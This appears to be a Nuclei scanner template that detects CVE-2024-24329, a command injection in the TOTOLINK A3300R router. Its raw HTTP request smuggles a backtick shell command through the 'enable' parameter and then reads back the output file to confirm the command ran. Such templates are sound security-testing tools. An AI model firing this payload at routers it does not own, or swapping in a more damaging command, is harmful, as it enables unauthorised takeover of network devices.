id: CVE-2024-24329 info: name: TotoLink Router setPortForwardRules - Command Injection author: pussycat0x severity: critical description: | TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function. impact: | Unauthenticated attackers can execute arbitrary OS commands via the enable parameter, potentially compromising the entire TOTOLINK router. remediation: | Update TOTOLINK A3300R firmware to a version newer than V17.0.0cu.557_B20221024. reference: - https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-24329 cwe-id: CWE-78 epss-score: 0.83293 epss-percentile: 0.99286 cpe: cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:* metadata: vendor: totolink product: a3300r_firmware fofa-query: title="totolink" tags: cve,cve2024,totolink,router,toto_link,unauth,intrusive,vkev,vuln http: - raw: - | POST /cgi-bin/cstecgi.cgi?token=C6F41C563E86A379 HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Origin: {{RootURL}} Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379 {"enable":"1`ls>/web/{{randstr}}.txt`","addEffect":"0","topicurl":"setPortForwardRules"} - | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379 matchers: - type: dsl dsl: - 'status_code_1 == 200 && status_code_2 == 200' - 'contains(body_1, "\"success\":true")' - 'contains_all(body_2, "bin","etc")' condition: and # digest: 4b0a00483046022100e66b2c761ab0d95b00a4747048348c53f23f18d49191764bc74866077188f0bf0221009357f8c0bde34f0b1c51d9ccd6a4e3326cd37373a7fdbb79e4385b7c1ed04fa4:922c64590222798bb761d5b6d8e72950